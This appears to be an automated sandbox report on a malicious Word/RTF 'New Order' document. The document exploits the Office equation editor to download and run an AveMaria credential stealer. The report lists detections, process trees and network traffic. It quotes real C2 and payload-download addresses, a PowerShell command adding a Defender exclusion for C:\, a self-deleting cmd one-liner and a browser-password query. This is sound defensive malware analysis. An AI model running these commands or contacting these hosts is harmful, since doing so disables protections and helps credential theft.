Windows Analysis Report
New Order ( MY 01-22-DTHI .doc

Overview

General Information

Sample Name:New Order ( MY 01-22-DTHI .doc
Analysis ID:679658
MD5:ae55aaa571fd4f87839cb1ebc9706d32
SHA1:f7dab7f7f3556fe38a001dba46c9e93d4ffbf32b
SHA256:49235a707a23701651de637ce90e530247dcf6877001f416aa459a9bb0a22daa
Tags:doc

Detection

AveMaria, UACMe
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Sigma detected: EQNEDT32.EXE connecting to internet
Initial sample is an obfuscated RTF file
Antivirus detection for URL or domain
Antivirus detection for dropped file
Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Antivirus / Scanner detection for submitted sample
Sigma detected: File Dropped By EQNEDT32EXE
Yara detected UACMe UAC Bypass tool
Yara detected AveMaria stealer
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Found stalling execution ending in API Sleep call
Allocates memory in foreign processes
Office equation editor drops PE file
Creates a thread in another existing process (thread injection)
Adds a directory exclusion to Windows Defender
Hides that the sample has been downloaded from the Internet (zone.identifier)
Writes to foreign memory regions
Increases the number of concurrent connection per server for Internet Explorer
Contains functionality to hide user accounts
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Contains functionality to steal e-mail passwords
Contains functionality to steal Chrome passwords or cookies
C2 URLs / IPs found in malware configuration
Office equation editor establishes network connection
Contains functionality to inject threads in other processes
Contains functionality to create new users
Antivirus or Machine Learning detection for unpacked file
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to enumerate running services
Contains functionality to dynamically determine API calls
Downloads executable code via HTTP
Document misses a certain OLE stream usually present in this Microsoft Office document type
Contains long sleeps (>= 3 min)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Potential document exploit detected (unknown TCP traffic)
PE file contains strange resources
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Found evasive API chain checking for process token information
Contains functionality to download and execute PE files
Checks if the current process is being debugged
Contains functionality to retrieve information about pressed keystrokes
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Creates a process in suspended mode (likely to inject code)
Queries the volume information (name, serial number etc) of a device
Yara signature match
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Internet Provider seen in connection with other malware
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Yara detected Credential Stealer
Contains functionality to call native functions
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
Document contains Microsoft Equation 3.0 OLE entries
Enables debug privileges
Installs a raw input device (often for capturing keystrokes)
Detected TCP or UDP traffic on non-standard ports
Office Equation Editor has been started
Contains functionality to download and launch executables
Uses Microsoft's Enhanced Cryptographic Provider
Potential document exploit detected (performs HTTP gets)

Classification

  • System is w7x64
  • WINWORD.EXE (PID: 772 cmdline: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding MD5: 9EE74859D22DAE61F1750B3A1BACB6F5)
  • EQNEDT32.EXE (PID: 1036 cmdline: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
    • fiftikmernk852317.exe (PID: 912 cmdline: C:\Users\user\AppData\Roaming\fiftikmernk852317.exe MD5: 5AE8471C10CDB2A59B950E66F8CA8A46)
      • powershell.exe (PID: 1468 cmdline: powershell Add-MpPreference -ExclusionPath C:\ MD5: 92F44E405DB16AC55D97E3BFE3B132FA)
      • cmd.exe (PID: 2512 cmdline: C:\Windows\System32\cmd.exe MD5: AD7B9C14083B52BC532FBA5948342B98)
  • fiftikmernk852317.exe (PID: 1420 cmdline: "C:\Users\user\AppData\Roaming\fiftikmernk852317.exe" MD5: 5AE8471C10CDB2A59B950E66F8CA8A46)
  • cleanup
{"C2 url": "76.8.53.133", "port": 1198}
Source: New Order ( MY 01-22-DTHI .doc | Rule: INDICATOR_RTF_MalVer_Objects | Description: Detects RTF documents with non-standard version and embedding one of the objects mostly observed in exploit documents. | Author: ditekSHen
Strings:
  • 0x12ac:$obj1: \objhtml
  • 0x12d1:$obj2: \objdata
  • 0x12f2:$obj2: \objdata
  • 0x15c4:$obj3: \objupdate
Source: 00000005.00000003.980052176.00000000004DB000.00000004.00000020.00020000.00000000.sdmp | Rule: JoeSecurity_CredentialStealer | Description: Yara detected Credential Stealer | Author: Joe Security
Source: 00000005.00000003.980052176.00000000004DB000.00000004.00000020.00020000.00000000.sdmp | Rule: JoeSecurity_AveMaria | Description: Yara detected AveMaria stealer | Author: Joe Security
Source: 00000005.00000003.980052176.00000000004DB000.00000004.00000020.00020000.00000000.sdmp | Rule: Windows_Trojan_AveMaria_31d2bce9 | Description: unknown | Author: unknown
Strings:
      • 0x31d8:$a1: cmd.exe /C ping 1.2.3.4 -n 2 -w 1000 > Nul & Del /f /q
      • 0x7be0:$a1: cmd.exe /C ping 1.2.3.4 -n 2 -w 1000 > Nul & Del /f /q
      • 0x1a20:$a2: SMTP Password
      • 0x6428:$a2: SMTP Password
      • 0xc60:$a3: select signon_realm, origin_url, username_value, password_value from logins
      • 0x5668:$a3: select signon_realm, origin_url, username_value, password_value from logins
      • 0x30e0:$a5: for /F "usebackq tokens=*" %%A in ("
      • 0x7ae8:$a5: for /F "usebackq tokens=*" %%A in ("
      • 0x1450:$a6: \Torch\User Data\Default\Login Data
      • 0x5e58:$a6: \Torch\User Data\Default\Login Data
      • 0x1fbc:$a8: "os_crypt":{"encrypted_key":"
      • 0x69c4:$a8: "os_crypt":{"encrypted_key":"
      • 0x18e8:$a10: \logins.json
      • 0x62f0:$a10: \logins.json
      • 0x1f34:$a11: Accounts\Account.rec0
      • 0x693c:$a11: Accounts\Account.rec0
      • 0x7f8:$a12: warzone160
      • 0x5200:$a12: warzone160
      • 0x2e88:$a13: Ave_Maria Stealer OpenSource github Link: https://github.com/syohex/java-simple-mine-sweeper
      • 0x7890:$a13: Ave_Maria Stealer OpenSource github Link: https://github.com/syohex/java-simple-mine-sweeper
Source: 00000005.00000003.979964184.00000000004D5000.00000004.00000020.00020000.00000000.sdmp | Rule: JoeSecurity_CredentialStealer | Description: Yara detected Credential Stealer | Author: Joe Security
Source: 00000005.00000003.979964184.00000000004D5000.00000004.00000020.00020000.00000000.sdmp | Rule: JoeSecurity_AveMaria | Description: Yara detected AveMaria stealer | Author: Joe Security
Source: 5.3.fiftikmernk852317.exe.4ce9f8.3.raw.unpack | Rule: Codoso_Gh0st_2 | Description: Detects Codoso APT Gh0st Malware | Author: Florian Roth
  • 0x2318:$s13: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09}
Source: 5.3.fiftikmernk852317.exe.4ce9f8.3.raw.unpack | Rule: Codoso_Gh0st_1 | Description: Detects Codoso APT Gh0st Malware | Author: Florian Roth
  • 0x2318:$x3: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09}
  • 0x2318:$c1: Elevation:Administrator!new:
Source: 5.3.fiftikmernk852317.exe.4ce9f8.3.raw.unpack | Rule: JoeSecurity_UACMe | Description: Yara detected UACMe UAC Bypass tool | Author: Joe Security
Source: 5.2.fiftikmernk852317.exe.24389af.3.raw.unpack | Rule: Codoso_Gh0st_2 | Description: Detects Codoso APT Gh0st Malware | Author: Florian Roth
  • 0xd80:$s13: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09}
Source: 5.2.fiftikmernk852317.exe.24389af.3.raw.unpack | Rule: Codoso_Gh0st_1 | Description: Detects Codoso APT Gh0st Malware | Author: Florian Roth
  • 0xd80:$x3: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09}
  • 0xd80:$c1: Elevation:Administrator!new:

Exploits

Source: Network Connection | Author: Joe Security | Data: DestinationIp: 208.67.105.179, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 1036, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49178
Source: File created | Author: Joe Security | Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 1036, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\fifthikmerozx[1].exe
No Snort rule has matched

AV Detection

Source: http://208.67.105.179/fifthikmerozx.exej | Avira URL Cloud: Label: malware
Source: 76.8.53.133 | Avira URL Cloud: Label: malware
Source: http://208.67.105.179/fifthikmerozx.exerrC: | Avira URL Cloud: Label: malware
Source: http://208.67.105.179/fifthikmerozx.exe. | Avira URL Cloud: Label: malware
Source: http://208.67.105.179/fifthikmerozx.exe | Avira URL Cloud: Label: malware
Source: http://208.67.105.179/fifthikmerozx.exelateC: | Avira URL Cloud: Label: malware
Source: C:\Users\user\AppData\Roaming\fiftikmernk852317.exe | Avira: detection malicious, Label: TR/AD.MortyStealer.obmwc
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\fifthikmerozx[1].exe | Avira: detection malicious, Label: TR/AD.MortyStealer.obmwc
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{F633E147-4322-4DEF-8D52-47EC935B75D3}.tmp | Avira: detection malicious, Label: EXP/CVE-2018-0798.Gen
Source: New Order ( MY 01-22-DTHI .doc | Virustotal: Detection: 42%
Source: New Order ( MY 01-22-DTHI .doc | Metadefender: Detection: 42%
Source: New Order ( MY 01-22-DTHI .doc | ReversingLabs: Detection: 47%
Source: New Order ( MY 01-22-DTHI .doc | Avira: detected
Source: Yara match | File source: 5.2.fiftikmernk852317.exe.242053f.4.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.2.fiftikmernk852317.exe.9a0000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.2.fiftikmernk852317.exe.242053f.4.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000005.00000003.980052176.00000000004DB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000003.979964184.00000000004D5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000003.980132553.00000000004DF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000003.979955423.00000000004CE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.1180934477.0000000002420000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.1180424961.00000000009B4000.00000002.00001000.00020000.00000000.sdmp, type: MEMORY
Source: 76.8.53.133 | Virustotal: Detection: 10%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\fifthikmerozx[1].exe | ReversingLabs: Detection: 57%
Source: C:\Users\user\AppData\Roaming\fiftikmernk852317.exe | ReversingLabs: Detection: 57%
Source: 5.2.fiftikmernk852317.exe.242053f.4.unpack | Avira: Label: TR/Patched.Ren.Gen3
Source: 5.2.fiftikmernk852317.exe.9a0000.0.unpack | Avira: Label: TR/Redcap.ghjpt
Source: 8.2.cmd.exe.2930000.0.unpack | Avira: Label: TR/Patched.Gen
Source: 5.2.fiftikmernk852317.exe.242053f.4.raw.unpack | Malware Configuration Extractor: AveMaria {"C2 url": "76.8.53.133", "port": 1198}
Source: C:\Users\user\AppData\Roaming\fiftikmernk852317.exe | Code function: 5_2_009AB15E lstrlenA,CryptStringToBinaryA,lstrcpyA,
Source: C:\Users\user\AppData\Roaming\fiftikmernk852317.exe | Code function: 5_2_009ACAFC CryptUnprotectData,LocalAlloc,LocalFree,
Source: C:\Users\user\AppData\Roaming\fiftikmernk852317.exe | Code function: 5_2_009ACCB4 BCryptOpenAlgorithmProvider,BCryptSetProperty,BCryptGenerateSymmetricKey,
Source: C:\Users\user\AppData\Roaming\fiftikmernk852317.exe | Code function: 5_2_009ACC54 CryptStringToBinaryW,LocalAlloc,CryptStringToBinaryW,LocalFree,
Source: C:\Users\user\AppData\Roaming\fiftikmernk852317.exe | Code function: 5_2_009AA632 RegQueryValueExW,GlobalAlloc,CryptUnprotectData,lstrcpyW,
Source: C:\Users\user\AppData\Roaming\fiftikmernk852317.exe | Code function: 5_2_009ACF58 LocalAlloc,BCryptDecrypt,LocalFree,

Exploits

Source: Yara match | File source: 5.3.fiftikmernk852317.exe.4ce9f8.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.2.fiftikmernk852317.exe.24389af.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.3.fiftikmernk852317.exe.4cff90.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.3.fiftikmernk852317.exe.4cd188.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.2.fiftikmernk852317.exe.242053f.4.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.2.fiftikmernk852317.exe.9a0000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.2.fiftikmernk852317.exe.242053f.4.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000005.00000002.1180934477.0000000002420000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.1180455880.0000000000AEF000.00000002.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000003.980168722.00000000004CD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000003.980064261.00000000004D0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: fiftikmernk852317.exe PID: 912, type: MEMORYSTR
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Process created: C:\Users\user\AppData\Roaming\fiftikmernk852317.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Process created: C:\Users\user\AppData\Roaming\fiftikmernk852317.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Network connect: IP: 208.67.105.179 Port: 80
Source: ~WRF{F633E147-4322-4DEF-8D52-47EC935B75D3}.tmp.0.dr | Stream path '_1721281446/\x1CompObj' : ...................F....Microsoft Equation 3.0....
Source: unknown | Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: C:\Users\user\AppData\Roaming\fiftikmernk852317.exe | Directory created: C:\Program Files\Microsoft DN1
Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000006.00000002.988694362.00000000029B6000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Management.Automation.pdbAA source: powershell.exe, 00000006.00000002.993133071.00000000057CD000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: G??\C:\Windows\system32\netutils.dllhell\v1.0\netutils.dllnfig\v2.0.50727.312\security.config.cch.1468.35906984on.pdby.resources.exes.exeI.ni.dlle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\.Ne source: powershell.exe, 00000006.00000002.988242865.0000000000534000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\System.Management.Automation.pdbK source: powershell.exe, 00000006.00000002.988694362.00000000029B6000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: indows\System.Management.Automation.pdbpdbion.pdb^ source: powershell.exe, 00000006.00000002.988694362.00000000029B6000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000006.00000002.988694362.00000000029B6000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 00000006.00000002.988694362.00000000029B6000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\symbols\dll\System.Management.Automation.pdb source: powershell.exe, 00000006.00000002.988694362.00000000029B6000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Users\user\AppData\Roaming\fiftikmernk852317.exe | Code function: 5_2_009B002B GetLogicalDriveStringsW,GetLogicalDriveStringsW,GetDriveTypeW,
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
Source: C:\Users\user\AppData\Roaming\fiftikmernk852317.exe | Code function: 5_2_009A9DF6 GetFullPathNameA,PathCombineA,PathCombineA,FindFirstFileA,PathCombineA,PathCombineA,FindNextFileA,
Source: C:\Users\user\AppData\Roaming\fiftikmernk852317.exe | Code function: 5_2_009AFF27 FindFirstFileW,FindNextFileW,
            Source: global trafficTCP traffic: 192.168.2.22:49178 -> 208.67.105.179:80
            Source: global trafficTCP traffic: 208.67.105.179:80 -> 192.168.2.22:49178
            Source: global trafficTCP traffic: 192.168.2.22:49178 -> 208.67.105.179:80
            Source: global trafficTCP traffic: 192.168.2.22:49178 -> 208.67.105.179:80
            Source: global trafficTCP traffic: 208.67.105.179:80 -> 192.168.2.22:49178
            Source: global trafficTCP traffic: 208.67.105.179:80 -> 192.168.2.22:49178
            Source: global trafficTCP traffic: 208.67.105.179:80 -> 192.168.2.22:49178
            Source: global trafficTCP traffic: 208.67.105.179:80 -> 192.168.2.22:49178
            Source: global trafficTCP traffic: 208.67.105.179:80 -> 192.168.2.22:49178
            Source: global trafficTCP traffic: 208.67.105.179:80 -> 192.168.2.22:49178
            Source: global trafficTCP traffic: 208.67.105.179:80 -> 192.168.2.22:49178
            Source: global trafficTCP traffic: 208.67.105.179:80 -> 192.168.2.22:49178
            Source: global trafficTCP traffic: 192.168.2.22:49178 -> 208.67.105.179:80
            Source: global trafficTCP traffic: 208.67.105.179:80 -> 192.168.2.22:49178
            Source: global trafficTCP traffic: 192.168.2.22:49178 -> 208.67.105.179:80
            Source: global trafficTCP traffic: 208.67.105.179:80 -> 192.168.2.22:49178
            Source: global trafficTCP traffic: 208.67.105.179:80 -> 192.168.2.22:49178
            Source: global trafficTCP traffic: 192.168.2.22:49178 -> 208.67.105.179:80
            Source: global trafficTCP traffic: 192.168.2.22:49178 -> 208.67.105.179:80
            Source: global trafficTCP traffic: 192.168.2.22:49178 -> 208.67.105.179:80
            Source: global trafficTCP traffic: 192.168.2.22:49178 -> 208.67.105.179:80
            Source: global trafficTCP traffic: 208.67.105.179:80 -> 192.168.2.22:49178
            Source: global trafficTCP traffic: 208.67.105.179:80 -> 192.168.2.22:49178
            Source: global trafficTCP traffic: 192.168.2.22:49178 -> 208.67.105.179:80
            Source: global trafficTCP traffic: 208.67.105.179:80 -> 192.168.2.22:49178
            Source: global trafficTCP traffic: 192.168.2.22:49178 -> 208.67.105.179:80
            Source: global trafficTCP traffic: 208.67.105.179:80 -> 192.168.2.22:49178
            Source: global trafficTCP traffic: 192.168.2.22:49178 -> 208.67.105.179:80
            Source: global trafficTCP traffic: 208.67.105.179:80 -> 192.168.2.22:49178
            Source: global trafficTCP traffic: 192.168.2.22:49178 -> 208.67.105.179:80
            Source: global trafficTCP traffic: 192.168.2.22:49178 -> 208.67.105.179:80
            Source: global trafficTCP traffic: 208.67.105.179:80 -> 192.168.2.22:49178
            Source: global trafficTCP traffic: 208.67.105.179:80 -> 192.168.2.22:49178
            Source: global trafficTCP traffic: 192.168.2.22:49178 -> 208.67.105.179:80
            Source: global trafficTCP traffic: 208.67.105.179:80 -> 192.168.2.22:49178
            Source: global trafficTCP traffic: 192.168.2.22:49178 -> 208.67.105.179:80
            Source: global trafficTCP traffic: 192.168.2.22:49178 -> 208.67.105.179:80
            Source: global trafficTCP traffic: 208.67.105.179:80 -> 192.168.2.22:49178
            Source: global trafficTCP traffic: 208.67.105.179:80 -> 192.168.2.22:49178
            Source: global trafficTCP traffic: 192.168.2.22:49178 -> 208.67.105.179:80
            Source: global trafficTCP traffic: 208.67.105.179:80 -> 192.168.2.22:49178
            Source: global trafficTCP traffic: 192.168.2.22:49178 -> 208.67.105.179:80
            Source: global trafficTCP traffic: 208.67.105.179:80 -> 192.168.2.22:49178
            Source: global trafficTCP traffic: 192.168.2.22:49178 -> 208.67.105.179:80
            Source: global trafficTCP traffic: 192.168.2.22:49178 -> 208.67.105.179:80
            Source: global trafficTCP traffic: 208.67.105.179:80 -> 192.168.2.22:49178
            Source: global trafficTCP traffic: 208.67.105.179:80 -> 192.168.2.22:49178
            Source: global trafficTCP traffic: 192.168.2.22:49178 -> 208.67.105.179:80
            Source: global trafficTCP traffic: 192.168.2.22:49178 -> 208.67.105.179:80
            Source: global trafficTCP traffic: 208.67.105.179:80 -> 192.168.2.22:49178
            Source: global trafficTCP traffic: 208.67.105.179:80 -> 192.168.2.22:49178
            Source: global trafficTCP traffic: 208.67.105.179:80 -> 192.168.2.22:49178
            Source: global trafficTCP traffic: 208.67.105.179:80 -> 192.168.2.22:49178
            Source: global trafficTCP traffic: 192.168.2.22:49178 -> 208.67.105.179:80
            Source: global trafficTCP traffic: 192.168.2.22:49178 -> 208.67.105.179:80
            Source: global trafficTCP traffic: 192.168.2.22:49178 -> 208.67.105.179:80
            Source: global trafficTCP traffic: 208.67.105.179:80 -> 192.168.2.22:49178
            Source: global trafficTCP traffic: 192.168.2.22:49178 -> 208.67.105.179:80
            Source: global trafficTCP traffic: 192.168.2.22:49178 -> 208.67.105.179:80
            Source: global trafficTCP traffic: 208.67.105.179:80 -> 192.168.2.22:49178
            Source: global trafficTCP traffic: 192.168.2.22:49178 -> 208.67.105.179:80
            Source: global trafficTCP traffic: 192.168.2.22:49178 -> 208.67.105.179:80
            Source: global trafficTCP traffic: 208.67.105.179:80 -> 192.168.2.22:49178
            Source: global trafficTCP traffic: 208.67.105.179:80 -> 192.168.2.22:49178
            Source: global trafficTCP traffic: 208.67.105.179:80 -> 192.168.2.22:49178
            Source: global trafficTCP traffic: 208.67.105.179:80 -> 192.168.2.22:49178
            Source: global trafficTCP traffic: 208.67.105.179:80 -> 192.168.2.22:49178
            Source: global trafficTCP traffic: 192.168.2.22:49178 -> 208.67.105.179:80
            Source: global trafficTCP traffic: 192.168.2.22:49178 -> 208.67.105.179:80
            Source: global trafficTCP traffic: 208.67.105.179:80 -> 192.168.2.22:49178
            Source: global trafficTCP traffic: 192.168.2.22:49178 -> 208.67.105.179:80
            Source: global trafficTCP traffic: 192.168.2.22:49178 -> 208.67.105.179:80
            Source: global trafficTCP traffic: 208.67.105.179:80 -> 192.168.2.22:49178
            Source: global trafficTCP traffic: 208.67.105.179:80 -> 192.168.2.22:49178
            Source: global trafficTCP traffic: 208.67.105.179:80 -> 192.168.2.22:49178
            Source: global trafficTCP traffic: 192.168.2.22:49178 -> 208.67.105.179:80
            Source: global trafficTCP traffic: 192.168.2.22:49178 -> 208.67.105.179:80
            Source: global trafficTCP traffic: 192.168.2.22:49178 -> 208.67.105.179:80
            Source: global trafficTCP traffic: 208.67.105.179:80 -> 192.168.2.22:49178
            Source: global trafficTCP traffic: 208.67.105.179:80 -> 192.168.2.22:49178
            Source: global trafficTCP traffic: 192.168.2.22:49178 -> 208.67.105.179:80
            Source: global trafficTCP traffic: 208.67.105.179:80 -> 192.168.2.22:49178
            Source: global trafficTCP traffic: 192.168.2.22:49178 -> 208.67.105.179:80
            Source: global trafficTCP traffic: 208.67.105.179:80 -> 192.168.2.22:49178
            Source: global trafficTCP traffic: 192.168.2.22:49178 -> 208.67.105.179:80
            Source: global trafficTCP traffic: 192.168.2.22:49178 -> 208.67.105.179:80
            Source: global trafficTCP traffic: 208.67.105.179:80 -> 192.168.2.22:49178
            Source: global trafficTCP traffic: 192.168.2.22:49178 -> 208.67.105.179:80
            Source: global trafficTCP traffic: 208.67.105.179:80 -> 192.168.2.22:49178
            Source: global trafficTCP traffic: 208.67.105.179:80 -> 192.168.2.22:49178
            Source: global trafficTCP traffic: 192.168.2.22:49178 -> 208.67.105.179:80
            Source: global trafficTCP traffic: 192.168.2.22:49178 -> 208.67.105.179:80
            Source: global trafficTCP traffic: 208.67.105.179:80 -> 192.168.2.22:49178
            Source: global trafficTCP traffic: 192.168.2.22:49178 -> 208.67.105.179:80
            Source: global trafficTCP traffic: 208.67.105.179:80 -> 192.168.2.22:49178
            Source: global trafficTCP traffic: 192.168.2.22:49178 -> 208.67.105.179:80
            Source: global trafficTCP traffic: 208.67.105.179:80 -> 192.168.2.22:49178
            Source: global trafficTCP traffic: 208.67.105.179:80 -> 192.168.2.22:49178
            Source: global trafficTCP traffic: 192.168.2.22:49178 -> 208.67.105.179:80
            Source: global trafficTCP traffic: 192.168.2.22:49178 -> 208.67.105.179:80
            Source: global trafficTCP traffic: 192.168.2.22:49178 -> 208.67.105.179:80
            Source: global trafficTCP traffic: 208.67.105.179:80 -> 192.168.2.22:49178
            Source: global trafficTCP traffic: 208.67.105.179:80 -> 192.168.2.22:49178
            Source: global trafficTCP traffic: 192.168.2.22:49178 -> 208.67.105.179:80
            Source: global trafficTCP traffic: 192.168.2.22:49178 -> 208.67.105.179:80
            Source: global trafficTCP traffic: 208.67.105.179:80 -> 192.168.2.22:49178
            Source: global trafficTCP traffic: 208.67.105.179:80 -> 192.168.2.22:49178
            Source: global trafficTCP traffic: 192.168.2.22:49178 -> 208.67.105.179:80
            Source: global trafficTCP traffic: 192.168.2.22:49178 -> 208.67.105.179:80
            Source: global trafficTCP traffic: 208.67.105.179:80 -> 192.168.2.22:49178
            Source: global trafficTCP traffic: 208.67.105.179:80 -> 192.168.2.22:49178
            Source: global trafficTCP traffic: 192.168.2.22:49178 -> 208.67.105.179:80
            Source: global trafficTCP traffic: 192.168.2.22:49178 -> 208.67.105.179:80
            Source: global trafficTCP traffic: 192.168.2.22:49178 -> 208.67.105.179:80
            Source: global trafficTCP traffic: 192.168.2.22:49178 -> 208.67.105.179:80
            Source: global trafficTCP traffic: 192.168.2.22:49178 -> 208.67.105.179:80
            Source: global trafficTCP traffic: 208.67.105.179:80 -> 192.168.2.22:49178
            Source: global trafficTCP traffic: 208.67.105.179:80 -> 192.168.2.22:49178
            Source: global trafficTCP traffic: 208.67.105.179:80 -> 192.168.2.22:49178
            Source: global trafficTCP traffic: 208.67.105.179:80 -> 192.168.2.22:49178
            Source: global trafficTCP traffic: 192.168.2.22:49178 -> 208.67.105.179:80
            Source: global trafficTCP traffic: 192.168.2.22:49178 -> 208.67.105.179:80
            Source: global trafficTCP traffic: 208.67.105.179:80 -> 192.168.2.22:49178
            Source: global trafficTCP traffic: 192.168.2.22:49178 -> 208.67.105.179:80

            Networking

            Source: Malware configuration extractor | URLs: 76.8.53.133
            Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Sat, 06 Aug 2022 06:57:45 GMTServer: ApacheLast-Modified: Thu, 04 Aug 2022 23:59:00 GMTETag: "23fe00-5e573221f770a"Accept-Ranges: bytesContent-Length: 2358784Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/octet-streamData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 b7 0f 5b 56 f3 6e 35 05 f3 6e 35 05 f3 6e 35 05 5e 30 34 04 f1 6e 35 05 5e 30 36 04 f7 6e 35 05 5e 30 31 04 fe 6e 35 05 5e 30 30 04 d5 6e 35 05 fa 16 b6 05 f0 6e 35 05 fa 16 a6 05 e8 6e 35 05 f3 6e 34 05 7d 6e 35 05 46 30 30 04 f0 6e 35 05 46 30 35 04 f2 6e 35 05 46 30 ca 05 f2 6e 35 05 f3 6e a2 05 f2 6e 35 05 46 30 37 04 f2 6e 35 05 52 69 63 68 f3 6e 35 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 2a 18 ec 62 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 00 00 8c 00 00 00 6e 23 00 00 00 00 00 3a 8d 00 00 